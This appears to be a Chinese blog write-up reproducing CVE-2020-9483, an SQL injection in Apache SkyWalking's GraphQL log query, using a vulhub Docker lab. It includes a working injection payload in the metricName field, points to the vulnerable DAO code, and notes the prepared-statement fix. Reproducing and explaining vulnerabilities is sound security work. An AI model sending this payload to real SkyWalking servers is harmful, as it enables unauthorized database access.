CVE-2020-9483 apache skywalking SQL注入漏洞

连人2023-10-14 12:22

漏洞概述

当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。

环境搭建

拉取vulhub

shell 复制代码 
git clone https://github.com/vulhub/vulhub.git

搭建镜像

shell 复制代码 
cd /vulhub/skywalking/8.3.0-sqli
docker-compose up -d

访问8080端口

漏洞复现

在首页刷新即可抓到报文。

输入payload

{
    "query":"query queryLogs($condition: LogQueryCondition) {
  queryLogs(condition: $condition) {
    total
    logs {
      serviceId
      serviceName
      isError
      content
    }
  }
}
",
    "variables":{
        "condition":{
            "metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --",
                        "endpointId":"1",
                    "traceId":"1",
                    "state":"ALL",
                    "stateCode":"1",
            "paging":{
                "pageSize":10
            }
        }
    }
}

查看返回结果

漏洞复现成功

漏洞原理

源码:https://github.com/apache/skywalking/releases/tag/v8.3.0

graphql是skywalking的一种查询协议,如果请求以下列JSON给出:

{
  bookById(id: "book-1"){
    id
    name
    pageCount
    author {
      firstName
      lastName
    }
  }
}

则返回结果为:

{
  "bookById": {
    "id":"book-1",
    "name":"Harry Potter and the Philosopher's Stone",
    "pageCount":223,
    "author": {
      "firstName":"Joanne",
      "lastName":"Rowling"
    }
  }
}

通常,graphql中会对对象类型进行定义:

type Query {
  bookById(id: ID): Book
}

type Book {
  id: ID
  name: String
  pageCount: Int
  author: Author
}

type Author {
  id: ID
  firstName: String
  lastName: String
}

此次产生漏洞的queryLogs为:

oap-server\server-query-plugin\query-graphql-plugin\src\main\resources\query-protocol\log.graphqls:

(这里不知道为什么下载的源码中没有,只能跑到github上看)

oap-server\server-query-plugin\query-graphql-plugin\src\main\java\org\apache\skywalking\oap\query\graphql\resolver\LogQuery.java

oap-server\server-storage-plugin\storage-jdbc-hikaricp-plugin\src\main\java\org\apache\skywalking\oap\server\storage\plugin\jdbc\h2\dao\H2LogQueryDAO.java

采取了直接拼接的方式。

5、修复方法

修复后使用了占位符,即预编译。

相关推荐
荼靡60313 分钟前
shell(三)
linux·服务器·数据库
尘浮生23 分钟前
Java项目实战II基于SpringBoot的共享单车管理系统开发文档+数据库+源码)
java·开发语言·数据库·spring boot·后端·微信小程序·小程序
杨江2 小时前
ThingsBoard安装测试
服务器·数据库
mit6.8242 小时前
[Redis#4] string | 常用命令 | + mysql use:cache | session
数据库·redis·后端·缓存
Beekeeper&&P...3 小时前
map和redis关系
数据库·redis·缓存
jianqimingtian3 小时前
如何使用 Matlab 制作 GrabCAD 体素打印切片
数据结构·数据库
真真假假々4 小时前
MySQL和ADSDB
数据库·mysql
yrldjsbk4 小时前
org.apache.log4j的日志记录级别和基础使用Demo
log4j·apache
秦老师Q4 小时前
MySQL第二章 sql约束与sql数据类型
数据库·sql·mysql
不是二师兄的八戒4 小时前
mysql in查询大数据量业务无法避免情境下优化
数据库·mysql
热门推荐
01ICLR24大模型提示(1/11) | BadChain:大型语言模型的后门思维链提示02PyTorch机器学习实现液态神经网络03【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总04【音视频 | opus】opus编解码库(opus-1.4)详细介绍以及使用——附带解码示例代码05Coze扣子平台完整体验和实践(附国内和国际版对比)06(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明07〔AI 绘画〕Stable Diffusion 之 解决绘制多人或面部很小的人物时面部崩坏问题 篇08玄机平台应急响应—webshell查杀09RAG 实践- Ollama+RagFlow 部署本地知识库10Docker 夺命连环 15 问